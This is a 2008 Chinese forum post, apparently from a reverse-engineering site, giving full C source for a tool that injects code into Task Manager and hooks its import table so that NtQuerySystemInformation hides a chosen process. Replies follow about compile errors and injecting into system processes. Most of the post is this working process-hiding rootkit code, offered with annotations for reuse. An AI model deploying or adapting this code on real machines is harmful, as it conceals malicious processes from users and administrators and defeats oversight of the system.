
[原创]IAT HOOK 代码注入非DLL

2008-10-13 15:26 19924

使用代码注入来实现进程隐藏  而不是使用DLL注入来实现进程隐藏
没有什么高级技术  纯体力活  原理就不说了  只是没有通过DLL注入  来实现HOOK API
纯粹注入代码   邪恶二进制上 也有个代码注入的 只是用了一个未公开的函数,我还看不懂
= =本来想用汇编写的  发现汇编注入代码远比C注入代码来的繁  所以用C实现了
主要功能就是隐藏进程。不过 RING3 的 IAT HOOK 只影响被注入的那一个进程（这里是任务管理器）：其他工具、或者通过 GetProcAddress 动态调用 NtQuerySystemInformation 的代码仍然看得到被隐藏的进程；而且 RWX 远程内存 + CreateRemoteThread 本身就是很明显的注入特征。所以实用价值不大，练习而已。
代码如下:
//需要编译成 Release 版本：Debug 版本默认开启增量链接，函数符号指向的是一张 jmp 跳转表（ILT），
//从"函数地址"起复制 2048 字节到远程进程时，复制到的只是 jmp xxxxx 桩，xxxxx 在远程进程里并不存在，
//程序必然崩溃。同样道理，被复制的两个函数不能引用任何全局变量、字符串常量或 CRT 函数，只能用结构体里传进去的地址。
#include "Iat_Hook.h"

char cPath[] = "taskmgr.exe";   // image name of the process to inject into; matched by GetProcessPid

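// Injector entry point.
//
// Locates taskmgr.exe, copies myNtQuerySystemInformation, a REMOTESTRUCT and
// RemoteThread into it, and starts RemoteThread there with the struct as its
// argument. Returns 0 on success, 1 on any failure.
//
// Caveats visible in this listing:
//  - dwSize (2048) is an upper bound, not the measured size of either
//    function; the bytes are taken straight out of this image, so the copied
//    functions must be position-independent and must not reference globals
//    or the CRT (see the Release-build note at the top of the file).
//  - Code is written into PAGE_EXECUTE_READWRITE memory and started with
//    CreateRemoteThread: the classic injection signature any EDR looks for.
//  - The three remote allocations are deliberately never freed on success:
//    the hook and its parameter block (whose cProcessName is referenced by
//    pointer from the hook) must stay mapped as long as the target runs.
//  - (DWORD)MyAddress truncates a pointer: x86 only.
int main(void)
{
        DWORD dwPid;
        HANDLE hProcess;
        HANDLE hThread = NULL;
        const DWORD dwSize = 2048;   // bytes copied per function (guess, see above)
        PVOID pRemoteAddress = NULL, pRemoteStructAddress = NULL, MyAddress = NULL;
        REMOTESTRUCT stRemoteStruct;
        int rc = 1;

        // PID 0 is the Idle process and GetProcessPid's "not found" value;
        // never try to open it.
        dwPid = GetProcessPid(cPath);
        if (dwPid == 0)
                return 1;

        // PROCESS_ALL_ACCESS on taskmgr.exe needs the same user or SeDebugPrivilege.
        hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPid);
        if (hProcess == NULL)
        {
                printf("open error code %lu\n", GetLastError());
                return 1;
        }

        // 1. the replacement NtQuerySystemInformation (must be executable)
        MyAddress = VirtualAllocEx(hProcess, NULL, dwSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
        if (MyAddress == NULL ||
            !WriteProcessMemory(hProcess, MyAddress, (LPCVOID)myNtQuerySystemInformation, dwSize, NULL))
        {
                printf("write hook error code %lu\n", GetLastError());
                goto cleanup;
        }

        // 2. the parameter block - plain data, so no execute permission
        InitializeStruct(&stRemoteStruct, (DWORD)MyAddress, dwPid);
        pRemoteStructAddress = VirtualAllocEx(hProcess, NULL, sizeof(REMOTESTRUCT), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
        if (pRemoteStructAddress == NULL ||
            !WriteProcessMemory(hProcess, pRemoteStructAddress, &stRemoteStruct, sizeof(REMOTESTRUCT), NULL))
        {
                printf("write struct error code %lu\n", GetLastError());
                goto cleanup;
        }

        // 3. the thread routine that performs the IAT patch
        pRemoteAddress = VirtualAllocEx(hProcess, NULL, dwSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
        if (pRemoteAddress == NULL ||
            !WriteProcessMemory(hProcess, pRemoteAddress, (LPCVOID)RemoteThread, dwSize, NULL))
        {
                printf("write thread error code %lu\n", GetLastError());
                goto cleanup;
        }

        hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pRemoteAddress,
                                     pRemoteStructAddress, 0, NULL);
        if (hThread == NULL)
        {
                printf("create thread error code %lu\n", GetLastError());
                goto cleanup;
        }
        rc = 0;

cleanup:
        if (rc != 0)
        {
                // Nothing runs in the target yet, so the pages can be released.
                if (pRemoteAddress != NULL)
                        VirtualFreeEx(hProcess, pRemoteAddress, 0, MEM_RELEASE);
                if (pRemoteStructAddress != NULL)
                        VirtualFreeEx(hProcess, pRemoteStructAddress, 0, MEM_RELEASE);
                if (MyAddress != NULL)
                        VirtualFreeEx(hProcess, MyAddress, 0, MEM_RELEASE);
        }
        if (hThread != NULL)
                CloseHandle(hThread);   // the original never closed the thread handle
        CloseHandle(hProcess);
        return rc;
}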

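// Runs inside the target process. main copies this function there
// byte-for-byte, so it may only use what pRemoteStruct carries: no globals,
// no CRT, no direct API calls (every API goes through the FARPROC values
// below). The return value is always 0; there is no channel back to the
// injector, so failures are silent.
//
// Two things happen here:
//  1. The real NtQuerySystemInformation, the wide-string compare routine and
//     a pointer to the name-to-hide are stashed in legacy MS-DOS header
//     fields of kernel32 (offsets 4, 8 and 0x14), which the NT loader does
//     not use once the image is mapped. The hook locates kernel32 through
//     the PEB and reads them back from there. Side effect: kernel32's header
//     page no longer matches the on-disk image, which an integrity check or
//     memory scanner can detect.
//  2. The main module's IAT slot holding the real NtQuerySystemInformation
//     address is redirected to the copied hook (dwMyAddress). This only works
//     when the main module imports NtQuerySystemInformation from ntdll
//     directly; otherwise nothing is patched.
DWORD __stdcall RemoteThread(PREMOTESTRUCT pRemoteStruct)
{
        FARPROC fpVirtualProtect = (FARPROC)pRemoteStruct->dwVirtualProtect;
        FARPROC fpLoadLibrary    = (FARPROC)pRemoteStruct->dwLoadLibrary;
        FARPROC fpFreeLibrary    = (FARPROC)pRemoteStruct->dwFreeLibrary;
        FARPROC fpGetProcAddress = (FARPROC)pRemoteStruct->dwGetProcAddress;
        FARPROC fplstrcmp        = (FARPROC)pRemoteStruct->dwlstrcmp;
        FARPROC fpEnum;
        HANDLE hSelf = (HANDLE)-1;   // GetCurrentProcess() pseudo-handle: nothing to open, nothing to leak
        HMODULE hMods[256];
        DWORD dwNeed = 0;
        HMODULE hPsapi, hKernel, hModule;
        DWORD dwOldProtect, dwUnused;
        DWORD dwImportRva;
        PIMAGE_DOS_HEADER pDosHeader;
        PIMAGE_NT_HEADERS pNtHeaders;
        PIMAGE_IMPORT_DESCRIPTOR pImport;
        PIMAGE_THUNK_DATA pThunk;
        // Points into the remote copy of REMOTESTRUCT, which main never frees;
        // the hook dereferences it on every call.
        wchar_t *pName = pRemoteStruct->cProcessName;

        // --- main module base: first entry returned by EnumProcessModules ---
        hPsapi = (HMODULE)fpLoadLibrary(pRemoteStruct->cDllName);
        if (hPsapi == NULL)
                return 0;
        fpEnum = (FARPROC)fpGetProcAddress(hPsapi, pRemoteStruct->cFunName);
        if (fpEnum == NULL || !fpEnum(hSelf, hMods, sizeof(hMods), &dwNeed) || dwNeed < sizeof(HMODULE))
        {
                fpFreeLibrary(hPsapi);
                return 0;
        }
        fpFreeLibrary(hPsapi);
        hModule = hMods[0];

        // --- stash the hook's "globals" in kernel32's DOS header ---
        // Only the header page needs to be writable; VirtualProtect rounds the
        // 0x18-byte range up to that page.
        hKernel = (HMODULE)fpLoadLibrary(pRemoteStruct->cKernel);
        if (hKernel == NULL)
                return 0;
        if (!fpVirtualProtect(hKernel, 0x18, PAGE_READWRITE, &dwOldProtect))
                return 0;
        *(DWORD *)((PBYTE)hKernel + 4)    = pRemoteStruct->dwNtQuerySystem;
        *(DWORD *)((PBYTE)hKernel + 8)    = pRemoteStruct->dwlstrcmpW;
        *(DWORD *)((PBYTE)hKernel + 0x14) = (DWORD)pName;
        fpVirtualProtect(hKernel, 0x18, dwOldProtect, &dwUnused);

        // --- locate the import descriptor for ntdll.dll in the main module ---
        pDosHeader = (PIMAGE_DOS_HEADER)hModule;
        // e_lfanew is a LONG; the original read only its low byte.
        pNtHeaders = (PIMAGE_NT_HEADERS)((PBYTE)hModule + pDosHeader->e_lfanew);
        dwImportRva = pNtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress;
        if (dwImportRva == 0)
                return 0;
        pImport = (PIMAGE_IMPORT_DESCRIPTOR)((PBYTE)hModule + dwImportRva);
        while (pImport->Name != 0 &&
               0 != fplstrcmp(pRemoteStruct->cNtdll, (PSTR)((PBYTE)hModule + pImport->Name)))
        {
                pImport++;
        }
        if (pImport->Name == 0)
                return 0;   // no ntdll import: the original fell through and walked the null descriptor

        // --- redirect the IAT slot holding the real NtQuerySystemInformation ---
        // FirstThunk is the IAT; after loading it holds resolved addresses, so
        // the slot is found by comparing against the real function's address.
        // u1.Function is a DWORD in current SDKs and a PDWORD in older ones;
        // going through a DWORD* compiles the same with either.
        pThunk = (PIMAGE_THUNK_DATA)((PBYTE)hModule + pImport->FirstThunk);
        for (; *(DWORD *)&pThunk->u1.Function != 0; pThunk++)
        {
                DWORD *pSlot = (DWORD *)&pThunk->u1.Function;
                if (*pSlot != pRemoteStruct->dwNtQuerySystem)
                        continue;
                if (fpVirtualProtect(pSlot, sizeof(DWORD), PAGE_READWRITE, &dwOldProtect))
                {
                        *pSlot = pRemoteStruct->dwMyAddress;
                        fpVirtualProtect(pSlot, sizeof(DWORD), dwOldProtect, &dwUnused);
                }
                break;
        }
        return 0;
}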

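// Replacement for ntdll!NtQuerySystemInformation, executed from the page
// main copied into the target. Calls the real function (address read back
// from the kernel32 DOS header, where RemoteThread stashed it) and, for
// SystemProcessesAndThreadsInformation, unlinks every entry whose image name
// equals the name-to-hide by extending its predecessor's NextEntryDelta.
// Returns the real function's status unchanged.
//
// Constraints: position-independent, no globals, no CRT.
// Known limitation: an entry at the head of the list has no predecessor and
// cannot be unlinked this way; in practice the head is the Idle process.
// The kernel32 lookup via PEB->Ldr->InInitializationOrderModuleList assumes
// kernel32 is the second module in that list, which holds on Windows XP; on
// later versions KernelBase.dll takes that slot and this reads the wrong
// module's header.
NTSTATUS WINAPI myNtQuerySystemInformation  (
                    SYSTEM_INFORMATION_CLASS SystemInformationClass,
                                PVOID SystemInformation,
                            ULONG SystemInformationLength,
                PULONG ReturnLength)
{
        HANDLE hKernel;
        NTSTATUS ntStatus;
        wchar_t *pName;
        FARPROC fpNtQuerySystem;
        FARPROC fplstrcmpW;
        PSYSTEM_PROCESS_INFORMATION pCurrent, pPrev;

        _asm
        {
                mov eax, fs:[0x30]      ; PEB
                mov eax, [eax+0xc]      ; PEB->Ldr
                mov ecx, [eax+0x1c]     ; InInitializationOrderModuleList.Flink (ntdll)
                mov ecx, [ecx]          ; next entry (kernel32 on XP)
                mov eax, [ecx+8]        ; DllBase
                mov hKernel, eax
        }
        // Values planted by RemoteThread in the DOS header.
        fpNtQuerySystem = *(FARPROC *)((PBYTE)hKernel + 4);
        fplstrcmpW      = *(FARPROC *)((PBYTE)hKernel + 8);
        pName           = *(wchar_t **)((PBYTE)hKernel + 0x14);

        ntStatus = ((NTQUERYSYSTEMINFORMATION)fpNtQuerySystem)(SystemInformationClass, SystemInformation,
                                                                SystemInformationLength, ReturnLength);

        // Only walk the buffer when the real call filled it: on a failure
        // status (negative, e.g. STATUS_INFO_LENGTH_MISMATCH on the caller's
        // first sizing call) the buffer contents are undefined. The original
        // walked it regardless.
        if (ntStatus < 0 || SystemInformationClass != SystemProcessesAndThreadsInformation ||
            SystemInformation == NULL)
                return ntStatus;

        pPrev = NULL;
        pCurrent = (PSYSTEM_PROCESS_INFORMATION)SystemInformation;
        for (;;)
        {
                int bHidden = 0;

                // Idle process has a NULL name buffer.
                if (pCurrent->ProcessName.Buffer != NULL &&
                    0 == fplstrcmpW(pCurrent->ProcessName.Buffer, pName))
                {
                        if (pPrev != NULL)
                        {
                                // Bridge over this entry, or terminate the list
                                // at the predecessor when this is the last one.
                                if (pCurrent->NextEntryDelta != 0)
                                        pPrev->NextEntryDelta += pCurrent->NextEntryDelta;
                                else
                                        pPrev->NextEntryDelta = 0;
                                bHidden = 1;
                        }
                        // else: head of the list, no predecessor to rewrite -
                        // left visible (the original assigned to the local
                        // parameter here, which never reached the caller).
                }

                // The last entry has delta 0; the original loop condition
                // skipped it, so a matching last entry was never hidden.
                if (pCurrent->NextEntryDelta == 0)
                        break;

                // A hidden entry must not become the predecessor: a second
                // matching entry right after it would then be unlinked from a
                // node the visible chain no longer reaches.
                if (!bHidden)
                        pPrev = pCurrent;
                pCurrent = (PSYSTEM_PROCESS_INFORMATION)((PBYTE)pCurrent + pCurrent->NextEntryDelta);
        }
        return ntStatus;
}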

//得到进程PID
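// Returns the PID of the first running process whose image name equals cPath
// (compared case-insensitively; the case Toolhelp reports is not guaranteed),
// or 0 when the snapshot fails or no such process exists. 0 is also the PID of
// the Idle process, so callers must treat 0 as "not found" and never open it.
DWORD GetProcessPid(char *cPath)
{
        PROCESSENTRY32 stProcess;
        HANDLE hSnap;
        DWORD dwPid = 0;

        if (cPath == NULL || cPath[0] == '\0')
                return 0;

        hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
        if (hSnap == INVALID_HANDLE_VALUE)
        {
                printf("error\n");
                return 0;
        }

        stProcess.dwSize = sizeof(PROCESSENTRY32);   // Toolhelp rejects the call without it
        if (!Process32First(hSnap, &stProcess))
        {
                printf("first error\n");
                CloseHandle(hSnap);   // the original leaked the snapshot on this path
                return 0;
        }

        do
        {
                if (0 == lstrcmpiA(stProcess.szExeFile, cPath))
                {
                        dwPid = stProcess.th32ProcessID;
                        break;
                }
        } while (Process32Next(hSnap, &stProcess));

        // The original re-checked the last enumerated entry against a
        // hard-coded "taskmgr.exe" instead of cPath, and leaked hSnap when
        // the process was not found.
        if (dwPid == 0)
                printf("can not find process\n");

        CloseHandle(hSnap);
        return dwPid;
}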

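// Fills the parameter block that main copies into the target.
//
// The addresses are resolved in the injector, not the target. They are usable
// there only because kernel32.dll and ntdll.dll are mapped at the same base in
// every process of one boot session (true on XP, which has no ASLR, and still
// true with per-boot ASLR on later systems) - which is also why they must be
// looked up at run time and never hard-coded. Every address is truncated to a
// 32-bit DWORD: x86 only.
//
// The struct is zeroed first so that unused slots and padding do not carry
// uninitialized stack bytes into the target; exports that fail to resolve are
// left as 0.
VOID InitializeStruct(PREMOTESTRUCT pRemoteStruct, DWORD MyAddress, DWORD dwPid)
{
        HMODULE hNtdll;
        HMODULE hKernel;

        memset(pRemoteStruct, 0, sizeof(*pRemoteStruct));

        // Both DLLs are already mapped in every Win32 process, so there is no
        // need for the LoadLibrary/FreeLibrary reference-count dance.
        hNtdll  = GetModuleHandleA("ntdll.dll");
        hKernel = GetModuleHandleA("kernel32.dll");

        if (hNtdll != NULL)
                pRemoteStruct->dwNtQuerySystem = (DWORD)GetProcAddress(hNtdll, "NtQuerySystemInformation");

        if (hKernel != NULL)
        {
                pRemoteStruct->dwVirtualProtect     = (DWORD)GetProcAddress(hKernel, "VirtualProtect");
                pRemoteStruct->dwVirtualQuery       = (DWORD)GetProcAddress(hKernel, "VirtualQuery");
                pRemoteStruct->dwOpenProcess        = (DWORD)GetProcAddress(hKernel, "OpenProcess");
                pRemoteStruct->dwGetProcAddress     = (DWORD)GetProcAddress(hKernel, "GetProcAddress");
                pRemoteStruct->dwFreeLibrary        = (DWORD)GetProcAddress(hKernel, "FreeLibrary");
                pRemoteStruct->dwLoadLibrary        = (DWORD)GetProcAddress(hKernel, "LoadLibraryA");
                pRemoteStruct->dwWriteProcessMemory = (DWORD)GetProcAddress(hKernel, "WriteProcessMemory");
                // Case-insensitive compares: import descriptors spell a DLL
                // name however the linker wrote it ("ntdll.dll" / "NTDLL.DLL"),
                // and the image name reported for a process keeps whatever
                // case it was launched with. lstrcmpA/lstrcmpW (the original
                // choice) would silently miss either.
                pRemoteStruct->dwlstrcmp  = (DWORD)GetProcAddress(hKernel, "lstrcmpiA");
                pRemoteStruct->dwlstrcmpW = (DWORD)GetProcAddress(hKernel, "lstrcmpiW");
        }

        pRemoteStruct->dwMyAddress = MyAddress;
        pRemoteStruct->dwPid = dwPid;

        // All literals fit the 50-element fields with room to spare.
        strcpy(pRemoteStruct->cDllName, "Psapi.dll");
        strcpy(pRemoteStruct->cFunName, "EnumProcessModules");
        strcpy(pRemoteStruct->cKernel, "Kernel32.dll");
        strcpy(pRemoteStruct->cNtdll, "ntdll.dll");
        // Image name to hide, matched against SYSTEM_PROCESS_INFORMATION.ProcessName.
        wcscpy(pRemoteStruct->cProcessName, L"explorer.exe");
}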

Iat_Hook.h

//头文件
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <tlhelp32.h>
#include <imagehlp.h>
#include "Winternl.h"

#pragma comment(lib, "imagehlp")
//类型声明

// NTSTATUS as a plain int: by kernel convention a negative value is a failure
// (NT_SUCCESS is status >= 0), which the hook relies on before walking the buffer.
typedef int NTSTATUS;
// Signature of psapi!EnumProcessModules, resolved at run time inside the target.
typedef BOOL (__stdcall *ENUMPROCESSMODULES)(
            HANDLE hProcess,
            HMODULE* lphModule,
            DWORD cb,
            LPDWORD lpcbNeeded
);

// Signature shared by ntdll!NtQuerySystemInformation and the replacement
// myNtQuerySystemInformation; both are __stdcall, so swapping the IAT slot
// keeps the calling convention intact.
typedef NTSTATUS (WINAPI *NTQUERYSYSTEMINFORMATION)(
                                                SYSTEM_INFORMATION_CLASS SystemInformationClass,
                                                PVOID SystemInformation,
                                                ULONG SystemInformationLength,
                                                PULONG ReturnLength
);

// Parameter block main copies into the target and passes to RemoteThread.
// Every address is a 32-bit DWORD, so the whole scheme is x86-only. The
// function addresses are taken from the injector's own kernel32/ntdll and are
// only valid in the target because those DLLs share a base across processes
// (see InitializeStruct). The hook keeps a pointer to cProcessName, so the
// remote copy of this struct must stay mapped for the life of the target.
typedef struct _REMOTE_STRUCT
{
        DWORD dwNtQuerySystem;        // ntdll!NtQuerySystemInformation (the real one)
        DWORD dwVirtualQuery;         // kernel32!VirtualQuery
        DWORD dwVirtualProtect;       // kernel32!VirtualProtect
        DWORD dwOpenProcess;          // kernel32!OpenProcess
        DWORD dwMessageBox;           // not used by this listing
        DWORD dwLoadLibrary;          // kernel32!LoadLibraryA
        DWORD dwGetProcAddress;       // kernel32!GetProcAddress
        DWORD dwFreeLibrary;          // kernel32!FreeLibrary
        DWORD dwWriteProcessMemory;   // kernel32!WriteProcessMemory
        DWORD dwlstrcmp;              // ANSI compare applied to import DLL names
        DWORD dwlstrcmpW;             // wide compare applied to process image names
        DWORD dwEnum;                 // not used; EnumProcessModules is resolved in the target
        DWORD dwMyAddress;            // remote address of the copied hook function
        DWORD dwPid;                  // PID of the target (taskmgr.exe)
        char cDllName[50];            // "Psapi.dll"
        char cFunName[50];            // "EnumProcessModules"
        char cKernel[50];             // "Kernel32.dll"
        char cNtdll[50];              // "ntdll.dll", matched against the target's import descriptors
        wchar_t cProcessName[50];     // image name to hide, e.g. L"explorer.exe"
}REMOTESTRUCT, *PREMOTESTRUCT;

//函数声明
// Injector side: PID of the process named cPath, 0 when not found.
DWORD GetProcessPid(char *cPath);
// Target side: thread routine copied into the target; patches the IAT.
DWORD __stdcall RemoteThread(PREMOTESTRUCT pRemoteStruct);
// Injector side: resolves the addresses and strings RemoteThread needs.
VOID InitializeStruct(PREMOTESTRUCT pRemoteStruct, DWORD MyAddress, DWORD dwPid);
// Target side: replacement installed in place of ntdll!NtQuerySystemInformation.
NTSTATUS WINAPI myNtQuerySystemInformation  (
                    SYSTEM_INFORMATION_CLASS SystemInformationClass,
                                PVOID SystemInformation,
                            ULONG SystemInformationLength,
                PULONG ReturnLength);

Winternl.h（自定义头文件，与较新 SDK 自带的 winternl.h 同名；用 #include "Winternl.h" 时会优先找到本地这份，不要再包含 SDK 版本，否则 UNICODE_STRING / SYSTEM_INFORMATION_CLASS 会重定义。这里的结构布局是 Windows XP 32 位的。）

// Counted wide string as used by the native API. Length/MaximumLength are in
// bytes and exclude any terminator; the kernel does not promise a NUL after
// Length bytes. The hook nevertheless passes Buffer to lstrcmpW, relying on
// the process-list buffer being NUL-terminated in practice - review note.
typedef struct _UNICODE_STRING {
  USHORT Length;
  USHORT MaximumLength;
  PWSTR  Buffer;                 // UTF-16 characters, not ANSI
} UNICODE_STRING, *PUNICODE_STRING;

// Information classes accepted by NtQuerySystemInformation. Only the numeric
// value matters; the names here follow the older unofficial naming, e.g.
// SystemProcessesAndThreadsInformation (5) is what the public headers call
// SystemProcessInformation. That class is the one the hook filters.
typedef enum _SYSTEM_INFORMATION_CLASS {
SystemBasicInformation,
SystemProcessorInformation,
SystemPerformanceInformation,
SystemTimeOfDayInformation,
SystemNotImplemented1,
SystemProcessesAndThreadsInformation,   // 5: process/thread list, see SYSTEM_PROCESS_INFORMATION
SystemCallCounts,
SystemConfigurationInformation,
SystemProcessorTimes,
SystemGlobalFlag,
SystemNotImplemented2,
SystemModuleInformation,
SystemLockInformation,
SystemNotImplemented3,
SystemNotImplemented4,
SystemNotImplemented5,
SystemHandleInformation,
SystemObjectInformation,
SystemPagefileInformation,
SystemInstructionEmulationCounts,
SystemInvalidInfoClass1,
SystemCacheInformation,
SystemPoolTagInformation,
SystemProcessorStatistics,
SystemDpcInformation,
SystemNotImplemented6,
SystemLoadImage,
SystemUnloadImage,
SystemTimeAdjustment,
SystemNotImplemented7,
SystemNotImplemented8,
SystemNotImplemented9,
SystemCrashDumpInformation,
SystemExceptionInformation,
SystemCrashDumpStateInformation,
SystemKernelDebuggerInformation,
SystemContextSwitchInformation,
SystemRegistryQuotaInformation,
SystemLoadAndCallImage,
SystemPrioritySeparation,
SystemNotImplemented10,
SystemNotImplemented11,
SystemInvalidInfoClass2,
SystemInvalidInfoClass3,
SystemTimeZoneInformation,
SystemLookasideInformation,
SystemSetTimeSlipEvent,
SystemCreateSession,
SystemDeleteSession,
SystemInvalidInfoClass4,
SystemRangeStartInformation,
SystemVerifierInformation,
SystemAddVerifier,
SystemSessionProcessesInformation
} SYSTEM_INFORMATION_CLASS;

// One entry of the buffer returned for SystemProcessesAndThreadsInformation.
// Entries form a singly linked chain inside one contiguous buffer: the next
// entry lives at (BYTE*)this + NextEntryDelta, and NextEntryDelta == 0 marks
// the last entry. Because the links are relative offsets, an entry can be
// "removed" simply by adding its delta to its predecessor's - which is all the
// hook does. Layout is the 32-bit XP one; field meanings beyond those used by
// the hook (NextEntryDelta, ProcessName) are as documented in the usual
// reversing references and are not verified here.
typedef struct _SYSTEM_PROCESS_INFORMATION  
{  
    DWORD NextEntryDelta;         // byte offset to the next entry; 0 = last
    DWORD dThreadCount;  
    DWORD dReserved01;  
    DWORD dReserved02;  
    DWORD dReserved03;  
    DWORD dReserved04;  
    DWORD dReserved05;  
    DWORD dReserved06;  
    FILETIME ftCreateTime; /* relative to 01-01-1601 */  
    FILETIME ftUserTime; /* 100 nsec units */  
    FILETIME ftKernelTime; /* 100 nsec units */  
    UNICODE_STRING ProcessName;      // image name; Buffer is NULL for the Idle process
    DWORD BasePriority;  
    DWORD dUniqueProcessId;            // process ID
    DWORD dParentProcessID;  
    DWORD dHandleCount;  
    DWORD dReserved07;  
    DWORD dReserved08;  
    DWORD VmCounters;  
    DWORD dCommitCharge;  
    PVOID ThreadInfos[1];              // variable-length thread array follows; entry size is therefore not fixed
} SYSTEM_PROCESS_INFORMATION, *PSYSTEM_PROCESS_INFORMATION;

后记:第一次没有照着书 打代码  也找不到C 注入代码的例子 能找到的都是DLL注入
原理早就知道了  真的写一遍 不容易
整个编写的过程 碰到了很多问题 最终都解决了  轻松了


最新回复 (31)
笨笨雄 14 2008-10-14 23:32
感谢分享代码
靴子 2008-10-15 20:53
象牛人学习
haras 2008-10-15 23:33
能进入System进程空间吗?
qyc 4 2008-10-17 10:01
把工程打包下就更好了,"无法无天的请求"
cyliu 1 2008-10-19 10:15
支持。只有想不到,没有做不到
panti 2008-10-20 10:14
真不得了,我在注入的进程(EXPLORER。EXE)里开了一个线程,结果文件夹一刷新就出错,纳闷不知怎么回事
徐大力 8 2008-10-20 18:10
System 空间不清楚 你试试 提到调试权限看看  不过我估计不能
驱动的DriverEntry例程 就是由System 处理  要进入 至少也要是个驱动吧

7L 的试试 在远程线程的代码  插一些 int 3 指令 虽然OD不能调试
但是可以通过OD查看内存  特别是API函数调用前后
71190838 1 2008-10-21 02:31
进入 System 空间应该也可以的,有些挂机锁就是用这个原理让勾子函数挂到WinLogon.exe上去了,不过好像只能是只读操作,有写入操作就会蓝屏。
莽莽 2008-10-21 11:41
我晕,编译通不过啊。先是
  CreateRemoteThread(hProcess, NULL, 0,
      pRemoteAddress,pRemoteStructAddress, 0, 0);出错,无法将PVOID转换为(LPTHREAD_START_ROUTINE),强制转换后,又在
  hProcess =(HANDLE)fpOpenProcess(PROCESS_ALL_ACCESS,
      FALSE, pRemoteStruct->dwPid);
出现错误       
1        error C2197: 'FARPROC' : too many arguments for call        f:\CRACK\学习笔记\VC++\IATHook\Iat_Hook.cpp        87       
——fpOpenProcess是FARPROC型,而windef.h中
typedef int (FAR WINAPI *FARPROC)();
后面还有很多类似的错误,楼主是如何调试通过的?我是在vs 2005 中建了个空项目,再把文件添加进去,不知道是不是这个原因?
徐大力 8 2008-10-21 14:29
VC 6.0
vs 2005 没用过。。。

GetProcAddress的声明
FARPROC
WINAPI
GetProcAddress(
    HMODULE hModule,
    LPCSTR lpProcName
    );
  
GetProcAddress得到的值都是FARPROC类型的
基本的东西查查MSDN吧还有C的基础打好
不回帖了  简单的把13L问题解释下
The LPTHREAD_START_ROUTINE type defines a pointer to this callback function. ThreadProc is a placeholder for the application-defined function name.

DWORD WINAPI ThreadProc(
  [in]                 LPVOID lpParameter
);
我的声明是
DWORD __stdcall RemoteThread(PREMOTESTRUCT pRemoteStruct)
WINAPI的声明 #define WINAPI __stdcall
LPVOID声明 typedef void *LPVOID  
void* (PVOID)实际上可以表示任意内存块的地址 详见C89  或者C99
返回PVOID  用之前强制转换一下就行了  至少VS2008 没有强制转换 可以正常编译
VS2005 和VS2008 里面添加的一大堆东西我看了头昏 所以除了查资料 一般我还是用VC6的

14L
系统直接有的 但是不能在远程线程中使用系统的  所以自己定义了一个变量存放它们的地址  fpGetProcAddress存放GetProcAddress
的地址 你也可以让它存放 LoadLibraryA的地址 变量名那样用只是方便记忆而已 变量名前加个fp 代表变量是个函数指针 function point  小程序无所谓的
fpEnum   指的是EnumProcessModules ,fplstrcmp指的是lstrcmpA    函数的用法不知道的话 一个就是MSDN 或者 google
菜菜小J 2008-10-21 17:07
《Three Ways to Inject Your Code into Another Process》

早之前的这个文章也给了大家很大的帮助。
莽莽 2008-10-21 20:20
  //写入远程线程函数
  pRemoteAddress = VirtualAllocEx(hProcess, NULL, dwSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
  WriteProcessMemory(hProcess, pRemoteAddress, RemoteThread, dwSize, NULL);

  //创建远程线程
  CreateRemoteThread(hProcess, NULL, 0,
      pRemoteAddress,pRemoteStructAddress, 0, 0);
  CloseHandle(hProcess);
}
在我的VS 2005中,VirtualAllocEx返回PVOID,PVOID pRemoteAddress正好可以作为WriteProcessMemory的参数,但是CreateRemoteThread第四个参数需要(LPTHREAD_START_ROUTINE)型,强制转换可以编译过去,难道是VS 2005和vc 6.0不一样?晕,这点小问题搞了一天了
莽莽 2008-10-22 12:15
还是想问一问,  FARPROC fpVirtualQuery;
  FARPROC fpVirtualProtect;
  FARPROC fpOpenProcess;
  FARPROC fpEnum;
  FARPROC fpGetProcAddress;
  FARPROC fpLoadLibrary;
  FARPROC fpFreeLibrary;
  FARPROC fpWriteMemory;
  FARPROC fplstrcmp;——系统都有了类似的函数,为什么要在前面加个fp,自己重新写个呢?功能是一样的吧?就是fpEnum,fplstrcmp不知道是干什么的啊?
newjueqi 7 2008-11-1 20:19
看了12楼介绍的文章,发觉老外的文章风格还是很觉得学习的,把整个思路都描述得很清楚,而且整篇文章结构清晰,使人产生阅读的快感
flameanger 2008-11-6 17:14
和楼主类似的代码实现,但为什么在远程线程中调用传进去的 系统 API ,会使目标进程自动退出?
也就是,在远程线程中总是不能调用已经传好的API
由于我是用C++ builder 编译的,把FARPROC 都 改成具体的函数的预定义了
flameanger 2008-11-6 17:18
API函数指针正确,在本进程运行,没有问题
abcdnswjl 2008-11-8 18:31
请问楼主,编译程序时出现这些问题,不知如何修正,请指教!!
Compiling...
test1.cpp
C:\test\test1\test1.cpp(51) : error C2197: 'int (__stdcall *)(void)' : too many actual parameters
C:\test\test1\test1.cpp(56) : error C2197: 'int (__stdcall *)(void)' : too many actual parameters
C:\test\test1\test1.cpp(57) : error C2197: 'int (__stdcall *)(void)' : too many actual parameters
C:\test\test1\test1.cpp(58) : error C2197: 'int (__stdcall *)(void)' : too many actual parameters
C:\test\test1\test1.cpp(59) : error C2197: 'int (__stdcall *)(void)' : too many actual parameters
C:\test\test1\test1.cpp(64) : error C2197: 'int (__stdcall *)(void)' : too many actual parameters
C:\test\test1\test1.cpp(65) : error C2197: 'int (__stdcall *)(void)' : too many actual parameters
C:\test\test1\test1.cpp(66) : error C2197: 'int (__stdcall *)(void)' : too many actual parameters
C:\test\test1\test1.cpp(67) : error C2197: 'int (__stdcall *)(void)' : too many actual parameters
C:\test\test1\test1.cpp(68) : error C2197: 'int (__stdcall *)(void)' : too many actual parameters
C:\test\test1\test1.cpp(69) : error C2197: 'int (__stdcall *)(void)' : too many actual parameters
C:\test\test1\test1.cpp(70) : error C2197: 'int (__stdcall *)(void)' : too many actual parameters
C:\test\test1\test1.cpp(80) : error C2197: 'int (__stdcall *)(void)' : too many actual parameters
